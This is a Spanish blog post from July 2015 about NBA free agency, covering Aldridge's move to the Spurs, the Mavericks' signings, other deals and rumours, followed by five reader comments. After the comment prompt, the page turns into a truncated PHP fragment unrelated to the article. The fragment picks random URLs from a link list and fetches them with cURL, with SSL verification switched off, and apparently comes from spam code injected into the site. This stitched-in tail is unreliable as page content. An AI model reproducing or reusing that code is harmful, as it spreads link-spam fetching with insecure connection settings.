Mercado NBA: Destino Texas

05 de July de 2015 por MagicJohnson32

La ficha principal de ese gran dominó que es el mercado de agentes libres en la NBA ha caído. LaMarcus Aldridge abandona los Blazers para jugar a las órdenes de Gregg Popovich las próximas 4 campañas. El PF, cortejado por Suns, Lakers, Rockets y media liga más, firma obviamente por el máximo (80 millones) y refuerza la condición de favoritos al anillo de los Spurs. Aldridge compartirá juego interior con Tim Duncan, quien pospone su retirada un año más. Seguimos pendientes del anuncio de Manu Ginóbili, que se está tomando su tiempo antes de tomar una decisión.

Otro de los agentes libres más cotizados de esta tanda 2015, DeAndre Jordan, también ha decidido cambiar las vistas al Océano Pacífico por Texas. El pívot abandona el regazo de Chris Paul y Doc Rivers en busca del protagonismo que le ha prometido Mark Cuban, quien desembolsará 20 millones anuales en su nuevo pívot. El magnate propietario de los Mavs ha estado ocupado estos días: también ha convencido a Wes Matthews para que rechace el ofertón que le hicieron los Kings (64 millones por 4 años) y acepte menos dinero para llevar sus flechas a Dallas.

Pese a las calabazas recibidas de sus principales objetivos en el mercado, los Kings han sido de los grandes protagonistas del fin de semana. Se la juegan con Rajon Rondo (aunque con un contrato de un solo año y 10 millones), añaden tiro exterior con Marco Belinelli (3 años, 19 millones) y un buen interior como Kosta Koufos (4 años, 33 millones). Otros especialistas en recibir calabazas, Knicks y Lakers, han reforzado finalmente su juego interior. Phil Jackson ha firmado a Robin Lopez (54 millones en 4 años), Derrick Williams (2 años, 10 millones) y a Kyle O’Quinn (4 años y 16 millones) mientras que Kupchak consigue vía traspaso lo que no le dio el mercado de FA: a cambio de un par de segundas rondas futuras, los Lakers se hacen con Roy Hibbert.

Y más desapercibidas han pasado la adquisición de CJ Watson por parte de los Magic (3 años, 15 millones), Biyombo por los Raptors (2 años, 6 millones) y la renovación de Beverley por los Rockets (4 años, 25 millones) y Dante Cunningham por los Pelicans (3 años, 9 millones).

Y ahora, los rumores:

  • JaVale McGee se presenta como gran candidato a suplir a DeAndre Jordan en los Clippers.
  • LeBron James no renovará con los Cavs hasta que Tristan Thompson esté firmado
  • Los Spurs no se conforman con Aldridge y van tras David West. Si falla, tienen sus miras puestas en Carlos Boozer.
  • Washington es otro equipo muy interesado en West, aunque en la capital se ve complicado el asunto y ya se ha optado por renovar a Gooden y buscar otro FA de perfil más bajo.
  • Una de las preguntas que más circulan estos días es “¿Quién es el base de los Mavs?”. Carlisle cuenta únicamente con Felton y Devin Harris, y entre los principales candidatos a reforzar la posición está Jeremy Lin, quien a pesar de la pobre temporada que completó en L.A. cuenta con mucho equipos interesados en él (Pacers, Rockets, Bulls, etc.).
Comenta

5 comentarios a esta entrada

  1. Guillermo dice:
    #1

    Lo de Aldrige puede ser una nueva version de torres gemelas en San Antonio como cuando estaba el almirante.Ahora el que jugará de 5 veterano a punto de retirarse será Duncan.Por cierto, viendo los contratos de estrellas, de 2 buenos jugadores de equipo como green y thompson (el de cleveland) lo de lamarcus con San Antonio es el chollo del siglo

      Citar

  2. Romino dice:
    #2

    Así a primeras:
    Ganan, san antonio para mantenerse como contender en el oeste y bucks para el este (a la espera de jabari y su vuelta).
    Pierden, lakers (rusell saldrá buemo?) y celtics dando un año más a la espera de agentes libres el año que viene (muy tristes los lakers como equipo pequeño en este mercado).
    Por el draft, observar a los wolves construir un equipo interesante con rubio ante su última oportunidad para formar parte de el.
    Los knicks se han apañado dentro de sus posibilidades, Carmelo debe ponerles en playoffs (calderón sobra por contrato ante todo) y kings incógnita rondo, cousins-karl…pero ganas de verlos.
    Y por último, sixers, un despropósito con un poco mala suerte…pero es lo que tiene jugar a construir un equipo con los dados del draft.
    Una temporada interesante de verdad, quitando denver que no pinta nada…hay alicientes para casi todos los equipos

      Citar

  3. Vader dice:
    #3

    Hoy he leído un artículo, no recuerdo si era en espn o un blog sobre los Knicks en que comentaban el porque Knicks y Lakers por ejemplo ya no tenían tanto imán sobre los AL y he encontrado una reflexión muy interesante. En años pasados cuando la NBA era una liga sobretodo norteamericana los grandes mercados como LA o New York eran muy atractivos para los jugadores, porque les permitían ganar mucho más dinero con la publicidad.

    Esto no ha dejado de ser así totalmente, pero ahora la NBA es una liga global. Se sigue en todo el mundo, y uno puede ser una superestrella y ganar mucho dinero en publicidad personal siendo el jugador franquicia por ejemplo de Oklahoma o New Orleans ¿Os suenan los ejemplos?

    Y por tanto de ahi algunas de las cosas que hemos visto este verano como por ejemplo que Monroe elija a los Bucks antes que a los Knicks porque aunque sea un mercado más pequeño, pero sólo a nivel USA, le permite jugar en un equipo más competitivo y preparado para triunfar desde el primer año que el equipo de NY… O el caso de M.Gasol que no se ha movido, LaMarcus en San Antonio, etc…

    Me ha parecido una reflexión muy acertada y que explica muchas cosas de hacía donde ha ido y hacía donde va la NBA actualmente.

    Saludos

      Citar

  4. Jose Luis dice:
    #4

    Lou Williams a los Lakers, 3 años x 21 millones… viendo los contratos que hay por ahi, me parece muy buena adquisición

    Tampoco creo que detenga la progresión de Russell o Clarkson, creo que habrá minutos para todos

      Citar

  5. Vader dice:
    #5

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>